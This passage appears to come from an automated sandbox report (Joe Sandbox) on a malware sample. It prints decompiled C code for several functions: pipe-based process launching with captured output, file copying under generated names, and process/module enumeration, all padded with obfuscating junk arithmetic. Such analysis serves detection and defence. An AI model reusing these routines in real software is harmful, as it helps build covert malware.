0x00f6125d
0x00f61264
0x00f61269
0x00f6127a
0x00f61280
0x00f61296
0x00f612b9
0x00f61298
0x00f61298
0x00f612a2
0x00f612a2
0x00f612c2
0x00f612cc
0x00f612d2
0x00f612d2
0x00f61230
0x00f612e0
0x00f612e6
0x00f612ec
0x00f612fc
0x00f61302
0x00f61308
0x00f61312
0x00f61312
0x00f6131c
0x00f61324
0x00f6132a
0x00f6132a
0x00f6133c
0x00f61348
0x00f61354
0x00f61356
0x00f6135e
0x00f61360
0x00000000
0x00000000
0x00f61360
0x00f61371

APIs

CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F610FF
SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00F61115
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F61129
SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00F61161
_memset.LIBCMT ref: 00F611BB
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,?,?,?), ref: 00F61208
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00F61228
CloseHandle.KERNEL32(?), ref: 00F6123A
CloseHandle.KERNEL32(?), ref: 00F61244

Part of subcall function 00F6B9C0: ReadFile.KERNEL32(?,?,00005000,?,00000000,?,00000000,?,00F6126E,?,?), ref: 00F6BA11
Part of subcall function 00F6B9C0: ReadFile.KERNEL32(?,?,00005000,?,00000000,?,?,?,00000000,?,00F6126E,?,?), ref: 00F6BA49

WaitForSingleObject.KERNEL32(?,00002710), ref: 00F6127A
CloseHandle.KERNEL32(?), ref: 00F612C2
CloseHandle.KERNEL32(?), ref: 00F612CC
CloseHandle.KERNEL32(?), ref: 00F612DA
CloseHandle.KERNEL32(?), ref: 00F61312
CloseHandle.KERNEL32(?), ref: 00F6131C
CloseHandle.KERNEL32(?), ref: 00F6132A

Strings

D, xrefs: 00F611FE
d#LP, xrefs: 00F61009

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Handle$Close$CreateFile$InformationPipeRead$ObjectProcessSingleWaitWrite_memset
String ID: D$d#LP
API String ID: 891997808-2829232397
Opcode ID: b0bc931d96e42d62ed3f0d53c1ed57af9975b80d3c9b3140fc808e85f942dd3f
Instruction ID: 5074ea5d12bdf778d9ff269e84939ed5f38d02bd992275b615e9713272e18bec
Opcode Fuzzy Hash: b0bc931d96e42d62ed3f0d53c1ed57af9975b80d3c9b3140fc808e85f942dd3f
Instruction Fuzzy Hash: 0EA16BB5E0021DEFEB04DFA0ED98AEE7BB8FB49700F148519E941A3294DB345954EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F8BE5E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E00F8BE5E(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char* _t21;
				void* _t23;
				unsigned int _t28;
				char* _t31;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				unsigned int _t37;
				char* _t40;
				intOrPtr* _t42;
				signed int* _t45;
				intOrPtr _t49;
				intOrPtr* _t51;

				_t21 =  *0xfb12d0; // 0x0
				_t23 =  *_t21 - 0x58;
				if(_t23 == 0) {
					 *0xfb12d0 =  *0xfb12d0 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t23 == 0) {
						_t28 =  *0xfb12e0; // 0x0
						 *0xfb12d0 =  *0xfb12d0 + 1;
						_t31 = "...";
						if(( !(_t28 >> 0x12) & 0x00000001) == 0) {
							_t31 = "<ellipsis>";
						}
						_push(_t31);
						L16:
						E00F8B4D8(_a4);
						return _a4;
					} else {
						E00F8BA1E(__edx,  &_v12);
						_t49 = _v8;
						if(_t49 != 0) {
							L11:
							_t34 = _a4;
							 *_t34 = _v12;
							 *((intOrPtr*)(_t34 + 4)) = _t49;
							return _t34;
						} else {
							_t35 =  *0xfb12d0; // 0x0
							_t36 =  *_t35;
							if(_t36 == 0) {
								goto L11;
							} else {
								if(_t36 == 0x40) {
									 *0xfb12d0 =  *0xfb12d0 + 1;
									goto L11;
								} else {
									if(_t36 == 0x5a) {
										_t37 =  *0xfb12e0; // 0x0
										 *0xfb12d0 =  *0xfb12d0 + 1;
										_t40 = ",...";
										if(( !(_t37 >> 0x12) & 0x00000001) == 0) {
											_t40 = ",<ellipsis>";
										}
										_t42 = E00F8BC08( &_v12,  &_v20, _t40);
										_t51 = _a4;
										 *_t51 =  *_t42;
										 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t42 + 4));
										return _t51;
									} else {
										_t45 = _a4;
										_t45[1] = _t45[1] & 0xffff00ff;
										 *_t45 =  *_t45 & 0x00000000;
										_t45[1] = 2;
										return _t45;
									}
								}
							}
						}
					}
				}
			}

0x00f8be63
0x00f8be6e
0x00f8be71
0x00f8bf26
0x00f8bf2c
0x00000000
0x00f8be77
0x00f8be79
0x00f8bf05
0x00f8bf0a
0x00f8bf17
0x00f8bf1c
0x00f8bf1e
0x00f8bf1e
0x00f8bf23
0x00f8bf31
0x00f8bf34
0x00f8bf3d
0x00f8be7f
0x00f8be83
0x00f8be89
0x00f8be8e
0x00f8bef8
0x00f8bef8
0x00f8befe
0x00f8bf00
0x00f8bf04
0x00f8be90
0x00f8be90
0x00f8be95
0x00f8be99
0x00000000
0x00f8be9b
0x00f8be9d
0x00f8bef2
0x00000000
0x00f8be9f
0x00f8bea1
0x00f8beb6
0x00f8bebb
0x00f8bec8
0x00f8becd
0x00f8becf
0x00f8becf
0x00f8bedc
0x00f8bee3
0x00f8bee6
0x00f8beeb
0x00f8bef1
0x00f8bea3
0x00f8bea3
0x00f8bea6
0x00f8bead
0x00f8beb0
0x00f8beb5
0x00f8beb5
0x00f8bea1
0x00f8be9d
0x00f8be99
0x00f8be8e
0x00f8be79

APIs

UnDecorator::getArgumentList.LIBCMT ref: 00F8BE83

Part of subcall function 00F8BA1E: Replicator::operator[].LIBCMT ref: 00F8BAA1
Part of subcall function 00F8BA1E: DName::operator+=.LIBCMT ref: 00F8BAA9

DName::operator+.LIBCMT ref: 00F8BEDC
DName::DName.LIBCMT ref: 00F8BF34

Strings

void, xrefs: 00F8BF2C
,<ellipsis>, xrefs: 00F8BECF, 00F8BED4
..., xrefs: 00F8BF17
,..., xrefs: 00F8BEC8
<ellipsis>, xrefs: 00F8BF1E, 00F8BF23

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: fef80a4b50a1aef0a4a10d576f123f57549fd453251f5ca232557564cb623612
Instruction ID: daa26c4c249ce4a01ba43cf79b6645d35c898b743c0f242de53fcf7d32c95f14
Opcode Fuzzy Hash: fef80a4b50a1aef0a4a10d576f123f57549fd453251f5ca232557564cb623612
Instruction Fuzzy Hash: CA21897170020C9FCB04DF5CE8949E93BB4FB46399F448195E906DB262CB70D902EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00F8D7F7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00F8D7F7(void* __edx, void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char* _t17;
				intOrPtr* _t20;
				void* _t23;
				void* _t26;
				signed int* _t31;
				void* _t41;

				_t41 = __edx;
				E00F8B4D8( &_v12, E00F8AB12(0));
				_t17 =  *0xfb12d0; // 0x0
				if( *_t17 == 0) {
					E00F8B3E6( &_v12, 1);
					goto L8;
				} else {
					 *0xfb12d0 = _t17 + 1;
					_t23 =  *_t17 - 0x30;
					if(_t23 == 0) {
						E00F8B9BA( &_v12, "void");
						goto L8;
					} else {
						_t26 = _t23;
						if(_t26 == 0) {
							E00F8B701( &_v12, E00F8D5A9(_t41, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t26 != 3) {
								L8:
								E00F8B9BA( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t31 = _a4;
								_t31[1] = _t31[1] & 0xffff00ff;
								 *_t31 =  *_t31 & 0x00000000;
								_t31[1] = 2;
								return _t31;
							}
						}
					}
				}
			}

0x00f8d7f7
0x00f8d80d
0x00f8d812
0x00f8d81a
0x00f8d871
0x00000000
0x00f8d81c
0x00f8d820
0x00f8d827
0x00f8d82a
0x00f8d865
0x00000000
0x00f8d82c
0x00f8d82d
0x00f8d82e
0x00f8d856
0x00000000
0x00f8d830
0x00f8d833
0x00f8d876
0x00f8d87e
0x00f8d886
0x00f8d889
0x00f8d88e
0x00f8d892
0x00f8d835
0x00f8d835
0x00f8d838
0x00f8d83f
0x00f8d842
0x00f8d847
0x00f8d847
0x00f8d833
0x00f8d82e
0x00f8d82a

APIs

UnDecorator::UScore.LIBCMT ref: 00F8D801
DName::DName.LIBCMT ref: 00F8D80D

Part of subcall function 00F8B4D8: DName::doPchar.LIBCMT ref: 00F8B509

UnDecorator::getScopedName.LIBCMT ref: 00F8D84C
DName::operator+=.LIBCMT ref: 00F8D856
DName::operator+=.LIBCMT ref: 00F8D865
DName::operator+=.LIBCMT ref: 00F8D871
DName::operator+=.LIBCMT ref: 00F8D87E

Strings

void, xrefs: 00F8D85D

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: a8aeb945367f1b39de02bc76cde5d81854968486827360faee583f5e41053f74
Instruction ID: e0e53219395f458b6bd11ad168e6ec6f50f123094661836074ea02f9beffd75f
Opcode Fuzzy Hash: a8aeb945367f1b39de02bc76cde5d81854968486827360faee583f5e41053f74
Instruction Fuzzy Hash: D4118271904208AFD709FF64CC56BED7BB0EF51310F044099E0069B2E2DB74DA45EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F74560 Relevance: 12.2, APIs: 8, Instructions: 225
fileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00F74560(void* __eflags, CHAR* _a4, long _a8, CHAR* _a12, intOrPtr _a16) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long long _v24;
				void* __edi;
				void* __esi;
				short _t35;
				void* _t39;
				signed char _t43;
				CHAR* _t52;
				void* _t54;
				unsigned int _t55;
				void* _t58;
				void* _t59;
				CHAR* _t67;
				void* _t73;
				CHAR* _t75;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr _t81;
				char _t82;
				void _t83;
				void _t84;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void _t95;
				signed int _t97;
				char _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t107;
				short _t108;
				char* _t109;
				void _t110;
				signed int _t111;
				intOrPtr _t112;
				char* _t114;
				long _t116;
				void* _t118;
				void* _t123;
				intOrPtr _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t140;
				void* _t143;
				void* _t146;
				long long _t164;
				long long _t173;
				long long _t175;

				_t35 =  *0xfae108; // 0x5dc4
				_t104 =  *0xfae4fc; // 0xc1ce
				_push(_t129);
				_t116 = _a8;
				 *0xfae530 =  *0xfae530 + 0x742eb497 - _t35 - _t104;
				 *0xfae108 =  *0xfae108 + 1;
				_push(_t116);
				 *0xfae020 = 0x829;
				_t39 = E00F7BE0A(_t116, _t129, __eflags);
				_t137 = _t136 + 4;
				_t73 = _t39;
				_v8 = _t73;
				_t130 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t130 == 0xffffffff) {
					L17:
					_push(_v8);
					_t43 = E00F7D7EC();
					_t78 =  *0xfae378; // 0x1dce92e
					_v12 = _t78;
					asm("fild dword [ebp-0x8]");
					_v24 = _t164;
					_v24 =  *0xfae20c + _v24;
					_t106 =  *0xfae158; // 0x80000000
					_v12 = _t106;
					asm("fild dword [ebp-0x8]");
					asm("fsubp st1, st0");
					asm("fcomp qword [ebp-0x14]");
					asm("fnstsw ax");
					 *0xfae2f0 =  *0xfae2f0 -  *0xfa75c8;
					asm("fld1");
					asm("fsubp st1, st0");
					if((_t43 & 0x00000001) != 0) {
						return _t43;
					}
					 *0xfae328 =  *0xfae328 -  *0xfa7a20;
					return _t43;
				}
				_t79 =  *0xfae47c; // 0xd2bf0293
				_t107 =  *0xfae0fc; // 0x76e9210e
				 *0xfae0fc = _t79 * _t107;
				 *0xfae47c =  *0xfae47c - 1;
				ReadFile(_t130, _t73, _t116,  &_v16, 0);
				CloseHandle(_t130);
				_t75 = _a12;
				E00F6A010(0x104, _t75);
				_t173 =  *0xfae584;
				_t81 =  *0xfae460; // 0x6c98b0f2
				_v24 = _t173;
				_t108 =  *0xfae524; // 0x58a1
				_v12 = _t81;
				asm("fild dword [ebp-0x8]");
				_v12 = _t108;
				asm("fsubr qword [ebp-0x14]");
				_v24 = _t173;
				asm("fild dword [ebp-0x8]");
				 *0xfae524 = E00F7CABC();
				_t175 =  *0xfae584;
				asm("fld1");
				asm("faddp st1, st0");
				 *0xfae584 = _t175;
				E00F670D0(_t81, _t175, _t75, GetTickCount());
				_t52 = _t75;
				_t140 = _t137 + 0x10;
				_t109 =  &(_t52[1]);
				do {
					_t82 =  *_t52;
					_t52 =  &(_t52[1]);
				} while (_t82 != 0);
				 *((char*)(_t52 - _t109 + _t75 - 4)) = _t82;
				_t54 =  *0xfb031c; // 0x27310d8
				_t132 = _t54;
				do {
					_t83 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t83 != 0);
				_t55 = _t54 - _t132;
				_t118 = _t75 - 1;
				do {
					_t84 =  *(_t118 + 1);
					_t118 = _t118 + 1;
					_t154 = _t84;
				} while (_t84 != 0);
				_t86 = _t55 >> 2;
				memcpy(_t132 + _t86 + _t86, _t132, memcpy(_t118, _t132, _t86 << 2) & 0x00000003);
				_t58 = E00F6CF90(_t154, _t175, 0x1611, 5);
				_t91 =  *0xfae144; // 0xca10ec72
				_t143 = _t140 + 0x20;
				 *0xfae144 = _t91 * 0xbdf326cf;
				_t93 = _t58;
				_t133 = _t58;
				do {
					_t110 =  *_t93;
					_t93 = _t93 + 1;
				} while (_t110 != 0);
				_t111 = _t93 - _t133;
				_t123 = _t75 - 1;
				do {
					_t95 =  *(_t123 + 1);
					_t123 = _t123 + 1;
				} while (_t95 != 0);
				_t97 = _t111 >> 2;
				_t59 = memcpy(_t123, _t133, _t97 << 2);
				memcpy(_t133 + _t97 + _t97, _t133, _t111 & 0x00000003);
				E00F76570(5, _t59);
				_t112 =  *0xfae4c0; // 0x94b914e2
				_t128 = _a16;
				_v12 = _t112;
				_t137 = _t143 + 0x20;
				asm("fild dword [ebp-0x8]");
				_v24 = _t175;
				_t164 =  *0xfae084 + _v24;
				 *0xfae1f0 = _t164;
				_t159 = _t128;
				if(_t128 < 0) {
					L15:
					_t134 = CreateFileA(_t75, 0x40000000, 0, 0, 2, 0, 0);
					if(_t134 != 0xffffffff) {
						WriteFile(_t134, _v8, _a8,  &_v16, 0);
						CloseHandle(_t134);
					}
					goto L17;
				}
				_t135 = E00F6CF90(_t159, _t164, 0x2ad5, 3);
				_t67 = _t75;
				_t146 = _t137 + 8;
				_t114 =  &(_t67[1]);
				do {
					_t103 =  *_t67;
					_t67 =  &(_t67[1]);
				} while (_t103 != 0);
				E00F7D7F7(_t67 - _t114 + _t75, _t135, _t128);
				E00F76570(3, _t135);
				_t137 = _t146 + 0x14;
				goto L15;
			}

0x00f74566
0x00f7456c
0x00f74581
0x00f74583
0x00f74588
0x00f7458e
0x00f7459a
0x00f7459b
0x00f745a2
0x00f745a7
0x00f745b4
0x00f745bf
0x00f745c8
0x00f745cd
0x00f74797
0x00f7479a
0x00f7479b
0x00f747a0
0x00f747a6
0x00f747a9
0x00f747b1
0x00f747be
0x00f747c7
0x00f747cd
0x00f747d0
0x00f747d3
0x00f747d5
0x00f747d8
0x00f747e6
0x00f747f2
0x00f747f4
0x00f747ff
0x00f74816
0x00f74816
0x00f7480d
0x00000000
0x00f7480d
0x00f745d3
0x00f745d9
0x00f745ea
0x00f745f0
0x00f745f7
0x00f745fe
0x00f74604
0x00f7460d
0x00f74612
0x00f74618
0x00f7461e
0x00f74621
0x00f74628
0x00f7462b
0x00f74631
0x00f74637
0x00f7463a
0x00f7463d
0x00f74648
0x00f7464e
0x00f74654
0x00f74656
0x00f74658
0x00f74666
0x00f7466b
0x00f7466d
0x00f74670
0x00f74673
0x00f74673
0x00f74675
0x00f74676
0x00f7467c
0x00f74680
0x00f74685
0x00f74687
0x00f74687
0x00f74689
0x00f7468a
0x00f7468e
0x00f74690
0x00f74693
0x00f74693
0x00f74696
0x00f74697
0x00f74697
0x00f7469d
0x00f746ae
0x00f746b0
0x00f746b5
0x00f746bb
0x00f746c4
0x00f746ca
0x00f746cc
0x00f746d0
0x00f746d0
0x00f746d2
0x00f746d3
0x00f746d9
0x00f746db
0x00f746e0
0x00f746e0
0x00f746e3
0x00f746e4
0x00f746ea
0x00f746ed
0x00f746f7
0x00f746f9
0x00f746fe
0x00f74704
0x00f74707
0x00f7470a
0x00f7470d
0x00f74710
0x00f74719
0x00f7471c
0x00f74722
0x00f74724
0x00f7475e
0x00f74774
0x00f74779
0x00f7478a
0x00f74791
0x00f74791
0x00000000
0x00f74779
0x00f74732
0x00f74734
0x00f74736
0x00f74739
0x00f74740
0x00f74740
0x00f74742
0x00f74743
0x00f7474e
0x00f74756
0x00f7475b
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,74CB4EE0,00F640B1,?,00F639A8,?,000000FF), ref: 00F745C2
ReadFile.KERNEL32(00000000,00000000,00F639A8,?,00000000), ref: 00F745F7
CloseHandle.KERNEL32(00000000), ref: 00F745FE
GetTickCount.KERNEL32 ref: 00F7465E

Part of subcall function 00F670D0: __itow.LIBCMT ref: 00F67152

_sprintf.LIBCMT ref: 00F7474E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00F7476E
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00F7478A
CloseHandle.KERNEL32(00000000), ref: 00F74791

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: File$CloseCreateHandle$CountReadTickWrite__itow_sprintf
String ID:
API String ID: 4152470416-0
Opcode ID: f31d9fd45e5d957c330d2f856a7cebcbb01b6e04768f101cae006cf34d90cd34
Instruction ID: cd05fd0779cc7f4cc72bb35ba51e870bfce5d95a3a5b5ee8b119bd24106bb480
Opcode Fuzzy Hash: f31d9fd45e5d957c330d2f856a7cebcbb01b6e04768f101cae006cf34d90cd34
Instruction Fuzzy Hash: 33813BB4D0021DEBD704DF60EC99BBE7BB8FB8A310F148155E985A7390DB305925E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F79F60 Relevance: 12.2, APIs: 8, Instructions: 179
processCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F79F60(void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				signed long long _v16;
				void* _v20;
				long long _v28;
				char _v288;
				int _v316;
				void* _v324;
				char _v325;
				char _v836;
				char _v1096;
				void* _v1384;
				short _t26;
				int _t28;
				void* _t31;
				void* _t37;
				intOrPtr _t45;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				short _t78;
				intOrPtr _t79;
				intOrPtr _t85;
				void* _t88;
				void* _t90;
				long long _t100;
				signed long long _t107;

				_t26 =  *0xfae01c; // 0x9b827a58
				 *0xfae524 = _t26;
				 *0xfae01c =  *0xfae01c - 1;
				_v325 = 0;
				_t59 = CreateToolhelp32Snapshot(2, 0);
				_v20 = _t59;
				_t94 = _t59;
				if(_t59 != 0) {
					_v324 = 0x128;
					_t28 = Process32First(_t59,  &_v324);
					_v16 =  *0xfae520;
					_t61 =  *0xfae580; // 0x0
					_t100 =  *0xfae380 +  *0xfa8058;
					_v8 = _t61;
					_v28 = _t100;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0xc]");
					 *0xfae520 = _t100 + _v28;
					_t103 =  *0xfae380 -  *0xfa75c8;
					 *0xfae380 =  *0xfae380 -  *0xfa75c8;
					__eflags = _t28;
					if(__eflags != 0) {
						_t85 = _a4;
						do {
							_t31 = E00F6CF90(__eflags, _t103, 0xe8d, 0xc);
							_push( &_v288);
							asm("fsubp st1, st0");
							 *0xfae4c8 =  *0xfa8054 -  *0xfae1e0;
							_t107 =  *0xfae1e0;
							asm("fld1");
							asm("faddp st1, st0");
							 *0xfae1e0 = _t107;
							E00F7E0C2( &_v836, 0x1ff, _t31, _v316);
							E00F76570(0xc, _t31);
							_t90 = _t90 + 0x24;
							E00F70980(_t85, _t107,  &_v836);
							_t37 = CreateToolhelp32Snapshot(8, _v316);
							_t78 =  *0xfae108; // 0x5dc4
							_t88 = _t37;
							_v8 = _t78;
							_v1384 = 0x224;
							asm("fild dword [ebp-0x4]");
							_v16 = _t107;
							_t103 =  *0xfae420 * _v16;
							 *0xfae108 = E00F7CABC();
							__eflags = Module32First(_t88,  &_v1384);
							if(__eflags == 0) {
								E00F70980(_t85, _t103, E00F6CF90(__eflags, _t103, 0x2885, 9));
								E00F76570(9, _t41);
								_t59 = _v20;
								_t90 = _t90 + 0x10;
							} else {
								E00F70980(_t85, _t103,  &_v1096);
							}
							E00F6AF70(0xa);
							_t45 =  *0xfae290; // 0xbbaa
							_v8 = _t45;
							asm("fild dword [ebp-0x4]");
							 *0xfae210 = _t103;
							CloseHandle(_t88);
							_t79 =  *0xfae1fc; // 0x80000000
							_t69 =  *0xfae080; // 0xf362bf6c
							 *0xfae1fc =  *0xfae1fc + 0xe0884aaa - _t79 - _t69;
							 *0xfae080 =  *0xfae080 - 1;
							_v324 = 0x128;
							__eflags = Process32Next(_t59,  &_v324);
						} while (__eflags != 0);
					}
					CloseHandle(_t59);
					return 1;
				} else {
					E00F70980(_a4, __fp0, E00F6CF90(_t94, __fp0, 0x3ef8, 0x11));
					E00F76570(0x11, _t52);
					 *0xfae288 =  *0xfae288 + 1;
					_t72 =  *0xfae288; // 0xec5403bf
					if(_t72 +  *0xfae3e8 <= 0xfc71a60d) {
						_t74 =  *0xfae2ec; // 0x76d570f4
						 *0xfae30c =  *0xfae30c + 0x2516096b - _t74;
						__eflags = 0;
						return 0;
					} else {
						 *0xfae2d8 = ( *0xfae2d8 & 0x0000ffff) * 0xde4e51fd;
						return 0;
					}
				}
			}

0x00f79f69
0x00f79f72
0x00f79f78
0x00f79f80
0x00f79f8d
0x00f79f8f
0x00f79f92
0x00f79f94
0x00f7a014
0x00f7a01e
0x00f7a02a
0x00f7a033
0x00f7a03a
0x00f7a043
0x00f7a046
0x00f7a049
0x00f7a04f
0x00f7a052
0x00f7a05e
0x00f7a064
0x00f7a06a
0x00f7a06c
0x00f7a073
0x00f7a080
0x00f7a087
0x00f7a0a6
0x00f7a0ad
0x00f7a0af
0x00f7a0b5
0x00f7a0c1
0x00f7a0c5
0x00f7a0cd
0x00f7a0d3
0x00f7a0db
0x00f7a0e0
0x00f7a0ec
0x00f7a0fa
0x00f7a100
0x00f7a107
0x00f7a10c
0x00f7a10f
0x00f7a119
0x00f7a11c
0x00f7a125
0x00f7a135
0x00f7a141
0x00f7a143
0x00f7a169
0x00f7a171
0x00f7a176
0x00f7a179
0x00f7a145
0x00f7a14e
0x00f7a14e
0x00f7a180
0x00f7a185
0x00f7a18e
0x00f7a192
0x00f7a195
0x00f7a19b
0x00f7a1a1
0x00f7a1a7
0x00f7a1bc
0x00f7a1c2
0x00f7a1ca
0x00f7a1da
0x00f7a1da
0x00f7a1e2
0x00f7a1e4
0x00f7a1f4
0x00f79f96
0x00f79fab
0x00f79fb3
0x00f79fb8
0x00f79fbe
0x00f79fd3
0x00f79ff1
0x00f79ffe
0x00f7a005
0x00f7a00b
0x00f79fd5
0x00f79fe3
0x00f79ff0
0x00f79ff0
0x00f79fd3

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F79F87
Process32First.KERNEL32(00000000,?), ref: 00F7A01E
__snprintf.LIBCMT ref: 00F7A0D3
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00F7A0FA
Module32First.KERNEL32(00000000,00000224), ref: 00F7A13B
CloseHandle.KERNEL32(00000000,0000000A,?,00000000), ref: 00F7A19B

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

Part of subcall function 00F76570: _memset.LIBCMT ref: 00F76593
Part of subcall function 00F76570: _free.LIBCMT ref: 00F76599

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: CreateFirstSnapshotToolhelp32$CloseHandleModule32Process32__snprintf_free_malloc_memset
String ID:
API String ID: 3285749804-0
Opcode ID: 4d413e6fc6dfefca6fd3eb76acb6e1874f3af984ff3107c070e8cb7828e2c668
Instruction ID: 348cfe8b7782ab391959126133df923495d65a2316fbe9dd9186a0893fcf3c88
Opcode Fuzzy Hash: 4d413e6fc6dfefca6fd3eb76acb6e1874f3af984ff3107c070e8cb7828e2c668
Instruction Fuzzy Hash: 9561E9B1A0021CDFE714DF54EC95BBE7BB8FF89300F008196F548962A5EBB05954EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F696D0 Relevance: 12.2, APIs: 8, Instructions: 173
processCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F696D0(void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				signed int _v12;
				long long _v20;
				long _v308;
				void* _v316;
				char _v576;
				short _t33;
				signed char _t36;
				short _t37;
				void* _t43;
				int _t46;
				intOrPtr _t47;
				int _t58;
				intOrPtr _t61;
				intOrPtr _t62;
				char _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				intOrPtr _t71;
				void* _t73;
				long long _t74;
				intOrPtr _t76;
				void* _t78;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				signed int _t101;
				signed int _t112;

				_t81 = __esi;
				_t33 =  *0xfae1c4; // 0x278e
				_t61 =  *0xfae0e0; // 0xd349f564
				 *0xfae1c4 =  *0xfae1c4 - 1;
				_t2 = _t33 + 0x157080b4; // 0xe8ba7618
				_t86 = _t85 - 0x23c;
				if(_t61 + _t2 <= 0x25ca2c88) {
					_t62 =  *0xfae5c4; // 0x80000000
					_v8 = _t62;
					asm("fild dword [ebp-0x4]");
					_v12 = _t101;
